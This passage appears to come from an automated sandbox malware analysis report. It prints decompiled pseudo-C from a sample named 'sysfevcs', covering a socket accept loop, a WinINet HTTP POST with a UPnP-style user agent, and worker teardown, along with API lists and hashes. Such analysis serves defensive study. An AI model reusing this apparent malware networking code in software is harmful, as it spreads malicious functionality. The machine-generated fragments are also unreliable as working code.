                                                                                                                                                                                                                                                                  						__imp__WSAEnumNetworkEvents( *((intOrPtr*)(_t56 + 0x14)),  *_t73,  &_v68);
                                                                                                                                                                                                                                                                  						if((_v80 & 0x00000008) != 0 && _v64 == 0 &&  *_t56 == 0x494f4350) {
                                                                                                                                                                                                                                                                  							_t49 =  *((intOrPtr*)(_t56 + 0x14));
                                                                                                                                                                                                                                                                  							_v100 = 0x10;
                                                                                                                                                                                                                                                                  							__imp__#1(_t49,  &_v96,  &_v100);
                                                                                                                                                                                                                                                                  							if(_t49 != 0xffffffff) {
                                                                                                                                                                                                                                                                  								_t77 = E0040DCB0(_t56, _t49);
                                                                                                                                                                                                                                                                  								_t81 = _t81 + 4;
                                                                                                                                                                                                                                                                  								if(_t77 != 0) {
                                                                                                                                                                                                                                                                  									_t15 = _t77 + 0x264; // 0x264
                                                                                                                                                                                                                                                                  									E0040DF40(0, _t77, _t56, _t15);
                                                                                                                                                                                                                                                                  									_t81 = _t81 + 8;
                                                                                                                                                                                                                                                                  									if( *((char*)(_t77 + 0x274)) == 0 &&  *_t77 == 0x69636c69) {
                                                                                                                                                                                                                                                                  										E0040E4F0(_t77);
                                                                                                                                                                                                                                                                  									}
                                                                                                                                                                                                                                                                  								}
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					_t34 = GetTickCount();
                                                                                                                                                                                                                                                                  					_t74 = _v92;
                                                                                                                                                                                                                                                                  					if(_t34 - _t74 < 0x3e8) {
                                                                                                                                                                                                                                                                  						if(GetTickCount() - _t74 < 0x2710) {
                                                                                                                                                                                                                                                                  							goto L24;
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						EnterCriticalSection(_t56 + 0x20);
                                                                                                                                                                                                                                                                  						_t75 =  *((intOrPtr*)(_t56 + 0x38));
                                                                                                                                                                                                                                                                  						if(_t75 == 0) {
                                                                                                                                                                                                                                                                  							L23:
                                                                                                                                                                                                                                                                  							LeaveCriticalSection(_t56 + 0x20);
                                                                                                                                                                                                                                                                  							_v92 = GetTickCount();
                                                                                                                                                                                                                                                                  							goto L24;
                                                                                                                                                                                                                                                                  						} else {
                                                                                                                                                                                                                                                                  							goto L19;
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						do {
                                                                                                                                                                                                                                                                  							L19:
                                                                                                                                                                                                                                                                  							_t42 = InterlockedExchangeAdd(_t75 + 4, 0);
                                                                                                                                                                                                                                                                  							if(E0040BB80() - _t42 >= 0x1e) {
                                                                                                                                                                                                                                                                  								_t45 =  *((intOrPtr*)(_t75 + 0x260));
                                                                                                                                                                                                                                                                  								if( *((intOrPtr*)(_t75 + 0x260)) != 0xffffffff) {
                                                                                                                                                                                                                                                                  									E00409320(_t45);
                                                                                                                                                                                                                                                                  									_t81 = _t81 + 4;
                                                                                                                                                                                                                                                                  									 *((intOrPtr*)(_t75 + 0x260)) = 0xffffffff;
                                                                                                                                                                                                                                                                  								}
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  							_t75 =  *((intOrPtr*)(_t75 + 0x280));
                                                                                                                                                                                                                                                                  						} while (_t75 != 0);
                                                                                                                                                                                                                                                                  						goto L23;
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					_t76 = _t56 + 0x20;
                                                                                                                                                                                                                                                                  					EnterCriticalSection(_t76);
                                                                                                                                                                                                                                                                  					_t70 =  *((intOrPtr*)(_t56 + 0x38));
                                                                                                                                                                                                                                                                  					if(_t70 == 0) {
                                                                                                                                                                                                                                                                  						L16:
                                                                                                                                                                                                                                                                  						LeaveCriticalSection(_t76);
                                                                                                                                                                                                                                                                  						goto L24;
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					while( *((intOrPtr*)(_t70 + 0x260)) != 0xffffffff) {
                                                                                                                                                                                                                                                                  						_t70 =  *((intOrPtr*)(_t70 + 0x280));
                                                                                                                                                                                                                                                                  						if(_t70 != 0) {
                                                                                                                                                                                                                                                                  							continue;
                                                                                                                                                                                                                                                                  						} else {
                                                                                                                                                                                                                                                                  							LeaveCriticalSection(_t76);
                                                                                                                                                                                                                                                                  							goto L24;
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					E0040E020(_t56, _t70, _t78);
                                                                                                                                                                                                                                                                  					goto L16;
                                                                                                                                                                                                                                                                  					L24:
                                                                                                                                                                                                                                                                  					_t33 = WaitForSingleObject( *(_t56 + 0x10), 1);
                                                                                                                                                                                                                                                                  				} while (_t33 != 0);
                                                                                                                                                                                                                                                                  				goto L25;
                                                                                                                                                                                                                                                                  			}




























                                                                                                                                                                                                                                                                  0x0040e126
                                                                                                                                                                                                                                                                  0x0040e12c
                                                                                                                                                                                                                                                                  0x0040e132
                                                                                                                                                                                                                                                                  0x0040e135
                                                                                                                                                                                                                                                                  0x0040e13f
                                                                                                                                                                                                                                                                  0x0040e147
                                                                                                                                                                                                                                                                  0x0040e2c9
                                                                                                                                                                                                                                                                  0x0040e2cf
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040e14d
                                                                                                                                                                                                                                                                  0x0040e14d
                                                                                                                                                                                                                                                                  0x0040e153
                                                                                                                                                                                                                                                                  0x0040e159
                                                                                                                                                                                                                                                                  0x0040e164
                                                                                                                                                                                                                                                                  0x0040e176
                                                                                                                                                                                                                                                                  0x0040e181
                                                                                                                                                                                                                                                                  0x0040e192
                                                                                                                                                                                                                                                                  0x0040e1a0
                                                                                                                                                                                                                                                                  0x0040e1a8
                                                                                                                                                                                                                                                                  0x0040e1b1
                                                                                                                                                                                                                                                                  0x0040e1bb
                                                                                                                                                                                                                                                                  0x0040e1bd
                                                                                                                                                                                                                                                                  0x0040e1c2
                                                                                                                                                                                                                                                                  0x0040e1c4
                                                                                                                                                                                                                                                                  0x0040e1d0
                                                                                                                                                                                                                                                                  0x0040e1d5
                                                                                                                                                                                                                                                                  0x0040e1df
                                                                                                                                                                                                                                                                  0x0040e1eb
                                                                                                                                                                                                                                                                  0x0040e1eb
                                                                                                                                                                                                                                                                  0x0040e1df
                                                                                                                                                                                                                                                                  0x0040e1c2
                                                                                                                                                                                                                                                                  0x0040e1b1
                                                                                                                                                                                                                                                                  0x0040e181
                                                                                                                                                                                                                                                                  0x0040e1f6
                                                                                                                                                                                                                                                                  0x0040e1f8
                                                                                                                                                                                                                                                                  0x0040e203
                                                                                                                                                                                                                                                                  0x0040e24c
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040e252
                                                                                                                                                                                                                                                                  0x0040e258
                                                                                                                                                                                                                                                                  0x0040e25d
                                                                                                                                                                                                                                                                  0x0040e2a1
                                                                                                                                                                                                                                                                  0x0040e2a5
                                                                                                                                                                                                                                                                  0x0040e2b1
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040e25f
                                                                                                                                                                                                                                                                  0x0040e25f
                                                                                                                                                                                                                                                                  0x0040e265
                                                                                                                                                                                                                                                                  0x0040e277
                                                                                                                                                                                                                                                                  0x0040e279
                                                                                                                                                                                                                                                                  0x0040e282
                                                                                                                                                                                                                                                                  0x0040e285
                                                                                                                                                                                                                                                                  0x0040e28a
                                                                                                                                                                                                                                                                  0x0040e28d
                                                                                                                                                                                                                                                                  0x0040e28d
                                                                                                                                                                                                                                                                  0x0040e282
                                                                                                                                                                                                                                                                  0x0040e297
                                                                                                                                                                                                                                                                  0x0040e29d
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040e25f
                                                                                                                                                                                                                                                                  0x0040e205
                                                                                                                                                                                                                                                                  0x0040e209
                                                                                                                                                                                                                                                                  0x0040e20f
                                                                                                                                                                                                                                                                  0x0040e214
                                                                                                                                                                                                                                                                  0x0040e23a
                                                                                                                                                                                                                                                                  0x0040e23b
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040e23b
                                                                                                                                                                                                                                                                  0x0040e216
                                                                                                                                                                                                                                                                  0x0040e21f
                                                                                                                                                                                                                                                                  0x0040e227
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040e229
                                                                                                                                                                                                                                                                  0x0040e22a
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040e22a
                                                                                                                                                                                                                                                                  0x0040e227
                                                                                                                                                                                                                                                                  0x0040e235
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040e2b5
                                                                                                                                                                                                                                                                  0x0040e2bb
                                                                                                                                                                                                                                                                  0x0040e2c1
                                                                                                                                                                                                                                                                  0x00000000

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetTickCount.KERNEL32 ref: 0040E12C
                                                                                                                                                                                                                                                                  • WaitForSingleObject.KERNEL32(?,00000001), ref: 0040E13F
                                                                                                                                                                                                                                                                  • WSAWaitForMultipleEvents.WS2_32(00000001,?,00000000,00000000,00000000), ref: 0040E159
                                                                                                                                                                                                                                                                  • WSAEnumNetworkEvents.WS2_32(?,?,?), ref: 0040E176
                                                                                                                                                                                                                                                                  • accept.WS2_32(?,?,?), ref: 0040E1A8
                                                                                                                                                                                                                                                                  • GetTickCount.KERNEL32 ref: 0040E1F6
                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 0040E209
                                                                                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 0040E22A
                                                                                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 0040E23B
                                                                                                                                                                                                                                                                  • GetTickCount.KERNEL32 ref: 0040E243
                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 0040E252
                                                                                                                                                                                                                                                                  • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 0040E265
                                                                                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 0040E2A5
                                                                                                                                                                                                                                                                  • GetTickCount.KERNEL32 ref: 0040E2AB
                                                                                                                                                                                                                                                                  • WaitForSingleObject.KERNEL32(?,00000001), ref: 0040E2BB
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000001.00000002.484609930.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484603911.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484622220.000000000040F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484629337.0000000000412000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_sysfevcs.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: CriticalSection$CountTick$LeaveWait$EnterEventsObjectSingle$EnumExchangeInterlockedMultipleNetworkaccept
                                                                                                                                                                                                                                                                  • String ID: PCOI$ilci
                                                                                                                                                                                                                                                                  • API String ID: 3345448188-3762367603
                                                                                                                                                                                                                                                                  • Opcode ID: 9e9b9f2650ee0e78d67b0b3fe0a34b94af4a8258587c596eb4717487bdf3801b
                                                                                                                                                                                                                                                                  • Instruction ID: fd6fa502bc2c0ef985739ca9974dfc73087b23499b60ed651c204545790cd000
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9e9b9f2650ee0e78d67b0b3fe0a34b94af4a8258587c596eb4717487bdf3801b
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AB41DF715002109BCB20DF75DD88B5B77A8AB48720F044E7EF955BB2C2DB38E859CB99
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  C-Code - Quality: 79%
                                                                                                                                                                                                                                                                  			E0040CA80(char* _a4, char* _a8, void* _a12, long* _a16) {
                                                                                                                                                                                                                                                                  				char _v260;
                                                                                                                                                                                                                                                                  				char _v772;
                                                                                                                                                                                                                                                                  				char* _v776;
                                                                                                                                                                                                                                                                  				void* _v780;
                                                                                                                                                                                                                                                                  				intOrPtr _v792;
                                                                                                                                                                                                                                                                  				char* _v796;
                                                                                                                                                                                                                                                                  				signed short _v816;
                                                                                                                                                                                                                                                                  				intOrPtr _v820;
                                                                                                                                                                                                                                                                  				char* _v824;
                                                                                                                                                                                                                                                                  				void _v836;
                                                                                                                                                                                                                                                                  				void* _v840;
                                                                                                                                                                                                                                                                  				void* _v844;
                                                                                                                                                                                                                                                                  				void* _v848;
                                                                                                                                                                                                                                                                  				char* _v852;
                                                                                                                                                                                                                                                                  				long _v856;
                                                                                                                                                                                                                                                                  				void _v1884;
                                                                                                                                                                                                                                                                  				long _v1888;
                                                                                                                                                                                                                                                                  				void* _t102;
                                                                                                                                                                                                                                                                  				void* _t103;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				_v776 = 0;
                                                                                                                                                                                                                                                                  				_v840 = 0;
                                                                                                                                                                                                                                                                  				memset( &_v836, 0, 0x38);
                                                                                                                                                                                                                                                                  				_t103 = _t102 + 0xc;
                                                                                                                                                                                                                                                                  				_v840 = 0x3c;
                                                                                                                                                                                                                                                                  				_v824 =  &_v260;
                                                                                                                                                                                                                                                                  				_v820 = 0x100;
                                                                                                                                                                                                                                                                  				_v796 =  &_v772;
                                                                                                                                                                                                                                                                  				_v792 = 0x200;
                                                                                                                                                                                                                                                                  				InternetCrackUrlA(_a4, 0, 0x10000000,  &_v840);
                                                                                                                                                                                                                                                                  				_v780 = InternetOpenA("Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x)", 1, 0, 0, 0);
                                                                                                                                                                                                                                                                  				if(_v780 != 0) {
                                                                                                                                                                                                                                                                  					_v844 = InternetConnectA(_v780,  &_v260, _v816 & 0x0000ffff, 0, 0, 3, 0, 0);
                                                                                                                                                                                                                                                                  					if(_v844 != 0) {
                                                                                                                                                                                                                                                                  						_v848 = HttpOpenRequestA(_v844, "POST",  &_v772, 0, 0, 0, 0, 0);
                                                                                                                                                                                                                                                                  						if(_v848 != 0) {
                                                                                                                                                                                                                                                                  							HttpAddRequestHeadersA(_v848, _a8, 0xffffffff, 0xa0000000);
                                                                                                                                                                                                                                                                  							_v852 = "Content-Type: text/xml; charset=\"utf-8\"\r\nConnection: Close\r\nCache-Control: no-cache\r\nPragma: no-cache\r\n";
                                                                                                                                                                                                                                                                  							if(HttpSendRequestA(_v848, _v852, 0xffffffff, _a12,  *_a16) != 0) {
                                                                                                                                                                                                                                                                  								_v856 = 0;
                                                                                                                                                                                                                                                                  								while(1 != 0) {
                                                                                                                                                                                                                                                                  									_t98 = _v848;
                                                                                                                                                                                                                                                                  									if(InternetReadFile(_v848,  &_v1884, 0x400,  &_v1888) != 0 && _v1888 != 0) {
                                                                                                                                                                                                                                                                  										_v776 = E00408880(_v776, _t98, _v776, _v856 + _v1888);
                                                                                                                                                                                                                                                                  										memcpy( &(_v776[_v856]),  &_v1884, _v1888);
                                                                                                                                                                                                                                                                  										_t103 = _t103 + 0x14;
                                                                                                                                                                                                                                                                  										_v856 = _v856 + _v1888;
                                                                                                                                                                                                                                                                  										continue;
                                                                                                                                                                                                                                                                  									}
                                                                                                                                                                                                                                                                  									break;
                                                                                                                                                                                                                                                                  								}
                                                                                                                                                                                                                                                                  								 *_a16 = _v856;
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  							InternetCloseHandle(_v848);
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						InternetCloseHandle(_v844);
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					InternetCloseHandle(_v780);
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				return _v776;
                                                                                                                                                                                                                                                                  			}






















                                                                                                                                                                                                                                                                  0x0040ca89
                                                                                                                                                                                                                                                                  0x0040ca93
                                                                                                                                                                                                                                                                  0x0040caa8
                                                                                                                                                                                                                                                                  0x0040caad
                                                                                                                                                                                                                                                                  0x0040cab0
                                                                                                                                                                                                                                                                  0x0040cac0
                                                                                                                                                                                                                                                                  0x0040cac6
                                                                                                                                                                                                                                                                  0x0040cad6
                                                                                                                                                                                                                                                                  0x0040cadc
                                                                                                                                                                                                                                                                  0x0040caf8
                                                                                                                                                                                                                                                                  0x0040cb11
                                                                                                                                                                                                                                                                  0x0040cb1e
                                                                                                                                                                                                                                                                  0x0040cb4a
                                                                                                                                                                                                                                                                  0x0040cb57
                                                                                                                                                                                                                                                                  0x0040cb80
                                                                                                                                                                                                                                                                  0x0040cb8d
                                                                                                                                                                                                                                                                  0x0040cba5
                                                                                                                                                                                                                                                                  0x0040cbab
                                                                                                                                                                                                                                                                  0x0040cbd7
                                                                                                                                                                                                                                                                  0x0040cbdd
                                                                                                                                                                                                                                                                  0x0040cbe7
                                                                                                                                                                                                                                                                  0x0040cc07
                                                                                                                                                                                                                                                                  0x0040cc16
                                                                                                                                                                                                                                                                  0x0040cc3f
                                                                                                                                                                                                                                                                  0x0040cc60
                                                                                                                                                                                                                                                                  0x0040cc65
                                                                                                                                                                                                                                                                  0x0040cc74
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040cc74
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040cc16
                                                                                                                                                                                                                                                                  0x0040cc88
                                                                                                                                                                                                                                                                  0x0040cc88
                                                                                                                                                                                                                                                                  0x0040cc91
                                                                                                                                                                                                                                                                  0x0040cc91
                                                                                                                                                                                                                                                                  0x0040cc9e
                                                                                                                                                                                                                                                                  0x0040cc9e
                                                                                                                                                                                                                                                                  0x0040ccab
                                                                                                                                                                                                                                                                  0x0040ccab
                                                                                                                                                                                                                                                                  0x0040ccba

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • memset.NTDLL ref: 0040CAA8
                                                                                                                                                                                                                                                                  • InternetCrackUrlA.WININET(00009E34,00000000,10000000,0000003C), ref: 0040CAF8
                                                                                                                                                                                                                                                                  • InternetOpenA.WININET(Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x),00000001,00000000,00000000,00000000), ref: 0040CB0B
                                                                                                                                                                                                                                                                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040CB44
                                                                                                                                                                                                                                                                  • HttpOpenRequestA.WININET(00000000,POST,?,00000000,00000000,00000000,00000000,00000000), ref: 0040CB7A
                                                                                                                                                                                                                                                                  • HttpAddRequestHeadersA.WININET(00000000,?,000000FF,A0000000), ref: 0040CBA5
                                                                                                                                                                                                                                                                  • HttpSendRequestA.WININET(00000000,0040F8D0,000000FF,00009E34), ref: 0040CBCF
                                                                                                                                                                                                                                                                  • InternetReadFile.WININET(00000000,?,00000400,?), ref: 0040CC0E
                                                                                                                                                                                                                                                                  • memcpy.NTDLL(00000000,?,00000000), ref: 0040CC60
                                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 0040CC91
                                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 0040CC9E
                                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 0040CCAB
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000001.00000002.484609930.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484603911.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484622220.000000000040F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484629337.0000000000412000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_sysfevcs.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Internet$CloseHandleHttpRequest$Open$ConnectCrackFileHeadersReadSendmemcpymemset
                                                                                                                                                                                                                                                                  • String ID: <$Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x)$POST
                                                                                                                                                                                                                                                                  • API String ID: 2761394606-2217117414
                                                                                                                                                                                                                                                                  • Opcode ID: 3fdeff464afb622b62c72841783980a28ec6984a3ef83e7d60f11a73aafb7751
                                                                                                                                                                                                                                                                  • Instruction ID: c856054e2ea53d444f21cfc80edf77a11ba1f019c23f833370997c74f21767c5
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3fdeff464afb622b62c72841783980a28ec6984a3ef83e7d60f11a73aafb7751
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BF512BB59012289BDB36CF54CD94BDA73BCAB48705F1441E9B60DBA280D778AF88CF54
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  C-Code - Quality: 92%
                                                                                                                                                                                                                                                                  			E0040DE00(intOrPtr* __edi) {
                                                                                                                                                                                                                                                                  				void* __esi;
                                                                                                                                                                                                                                                                  				void* _t25;
                                                                                                                                                                                                                                                                  				long _t40;
                                                                                                                                                                                                                                                                  				intOrPtr* _t53;
                                                                                                                                                                                                                                                                  				intOrPtr* _t55;
                                                                                                                                                                                                                                                                  				void* _t56;
                                                                                                                                                                                                                                                                  				LONG* _t62;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				_t53 = __edi;
                                                                                                                                                                                                                                                                  				if(__edi == 0 ||  *__edi != 0x494f4350) {
                                                                                                                                                                                                                                                                  					return _t25;
                                                                                                                                                                                                                                                                  				} else {
                                                                                                                                                                                                                                                                  					_t1 = _t53 + 0x20; // 0x20
                                                                                                                                                                                                                                                                  					EnterCriticalSection(_t1);
                                                                                                                                                                                                                                                                  					_t55 =  *((intOrPtr*)(__edi + 0x38));
                                                                                                                                                                                                                                                                  					if(_t55 == 0) {
                                                                                                                                                                                                                                                                  						L11:
                                                                                                                                                                                                                                                                  						_t13 = _t53 + 0x20; // 0x20
                                                                                                                                                                                                                                                                  						LeaveCriticalSection(_t13);
                                                                                                                                                                                                                                                                  						SetEvent( *(_t53 + 0x10));
                                                                                                                                                                                                                                                                  						_t56 = 0;
                                                                                                                                                                                                                                                                  						if( *((intOrPtr*)(_t53 + 4)) <= 0) {
                                                                                                                                                                                                                                                                  							L14:
                                                                                                                                                                                                                                                                  							E0040B9B0( *((intOrPtr*)(_t53 + 0xc)), 0xffffffff);
                                                                                                                                                                                                                                                                  							E0040BAF0( *((intOrPtr*)(_t53 + 0xc)));
                                                                                                                                                                                                                                                                  							CloseHandle( *(_t53 + 8));
                                                                                                                                                                                                                                                                  							CloseHandle( *(_t53 + 0x10));
                                                                                                                                                                                                                                                                  							__imp__WSACloseEvent( *((intOrPtr*)(_t53 + 0x18)));
                                                                                                                                                                                                                                                                  							E00409320( *((intOrPtr*)(_t53 + 0x14)));
                                                                                                                                                                                                                                                                  							_t24 = _t53 + 0x20; // 0x20
                                                                                                                                                                                                                                                                  							DeleteCriticalSection(_t24);
                                                                                                                                                                                                                                                                  							return E00408990(_t53);
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						do {
                                                                                                                                                                                                                                                                  							PostQueuedCompletionStatus( *(_t53 + 8), 0, 0, 0);
                                                                                                                                                                                                                                                                  							_t56 = _t56 + 1;
                                                                                                                                                                                                                                                                  						} while (_t56 <  *((intOrPtr*)(_t53 + 4)));
                                                                                                                                                                                                                                                                  						goto L14;
                                                                                                                                                                                                                                                                  					} else {
                                                                                                                                                                                                                                                                  						goto L3;
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					do {
                                                                                                                                                                                                                                                                  						L3:
                                                                                                                                                                                                                                                                  						if( *_t55 == 0x69636c69) {
                                                                                                                                                                                                                                                                  							if( *((char*)(_t55 + 0x275)) == 0) {
                                                                                                                                                                                                                                                                  								_t62 = _t55 + 0x21c;
                                                                                                                                                                                                                                                                  								_t40 = InterlockedExchangeAdd(_t62, 0);
                                                                                                                                                                                                                                                                  								if(_t40 == 0) {
                                                                                                                                                                                                                                                                  									 *(_t55 + 0x230) = _t40;
                                                                                                                                                                                                                                                                  									 *((intOrPtr*)(_t55 + 0x220)) = 1;
                                                                                                                                                                                                                                                                  									 *((intOrPtr*)(_t55 + 0x228)) = _t55 + 8;
                                                                                                                                                                                                                                                                  									 *((intOrPtr*)(_t55 + 0x22c)) = 0x200;
                                                                                                                                                                                                                                                                  									InterlockedIncrement(_t62);
                                                                                                                                                                                                                                                                  									if(E0040E450(_t55) == 0) {
                                                                                                                                                                                                                                                                  										InterlockedDecrement(_t62);
                                                                                                                                                                                                                                                                  									}
                                                                                                                                                                                                                                                                  								}
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						_t55 =  *((intOrPtr*)(_t55 + 0x280));
                                                                                                                                                                                                                                                                  					} while (_t55 != 0);
                                                                                                                                                                                                                                                                  					goto L11;
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  			}










                                                                                                                                                                                                                                                                  0x0040de00
                                                                                                                                                                                                                                                                  0x0040de02
                                                                                                                                                                                                                                                                  0x0040df37
                                                                                                                                                                                                                                                                  0x0040de14
                                                                                                                                                                                                                                                                  0x0040de16
                                                                                                                                                                                                                                                                  0x0040de1a
                                                                                                                                                                                                                                                                  0x0040de20
                                                                                                                                                                                                                                                                  0x0040de25
                                                                                                                                                                                                                                                                  0x0040deb0
                                                                                                                                                                                                                                                                  0x0040deb0
                                                                                                                                                                                                                                                                  0x0040deb4
                                                                                                                                                                                                                                                                  0x0040debe
                                                                                                                                                                                                                                                                  0x0040dec4
                                                                                                                                                                                                                                                                  0x0040dec9
                                                                                                                                                                                                                                                                  0x0040dee3
                                                                                                                                                                                                                                                                  0x0040dee9
                                                                                                                                                                                                                                                                  0x0040def2
                                                                                                                                                                                                                                                                  0x0040df04
                                                                                                                                                                                                                                                                  0x0040df0a
                                                                                                                                                                                                                                                                  0x0040df10
                                                                                                                                                                                                                                                                  0x0040df1a
                                                                                                                                                                                                                                                                  0x0040df22
                                                                                                                                                                                                                                                                  0x0040df26
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040df36
                                                                                                                                                                                                                                                                  0x0040ded1
                                                                                                                                                                                                                                                                  0x0040dedb
                                                                                                                                                                                                                                                                  0x0040dedd
                                                                                                                                                                                                                                                                  0x0040dede
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040de2b
                                                                                                                                                                                                                                                                  0x0040de2b
                                                                                                                                                                                                                                                                  0x0040de31
                                                                                                                                                                                                                                                                  0x0040de53
                                                                                                                                                                                                                                                                  0x0040de57
                                                                                                                                                                                                                                                                  0x0040de5e
                                                                                                                                                                                                                                                                  0x0040de66
                                                                                                                                                                                                                                                                  0x0040de6c
                                                                                                                                                                                                                                                                  0x0040de72
                                                                                                                                                                                                                                                                  0x0040de7c
                                                                                                                                                                                                                                                                  0x0040de82
                                                                                                                                                                                                                                                                  0x0040de8c
                                                                                                                                                                                                                                                                  0x0040de99
                                                                                                                                                                                                                                                                  0x0040de9c
                                                                                                                                                                                                                                                                  0x0040de9c
                                                                                                                                                                                                                                                                  0x0040de99
                                                                                                                                                                                                                                                                  0x0040de66
                                                                                                                                                                                                                                                                  0x0040de53
                                                                                                                                                                                                                                                                  0x0040dea2
                                                                                                                                                                                                                                                                  0x0040dea8
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040de2b

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(00000020,0040B670,?,0040E9A4), ref: 0040DE1A
                                                                                                                                                                                                                                                                  • InterlockedDecrement.KERNEL32(?), ref: 0040DE46
                                                                                                                                                                                                                                                                  • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 0040DE5E
                                                                                                                                                                                                                                                                  • InterlockedIncrement.KERNEL32(?), ref: 0040DE8C
                                                                                                                                                                                                                                                                  • InterlockedDecrement.KERNEL32(?), ref: 0040DE9C
                                                                                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(00000020,?,0040E9A4), ref: 0040DEB4
                                                                                                                                                                                                                                                                  • SetEvent.KERNEL32(?,?,0040E9A4), ref: 0040DEBE
                                                                                                                                                                                                                                                                  • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000000,00000000,?,0040E9A4), ref: 0040DEDB
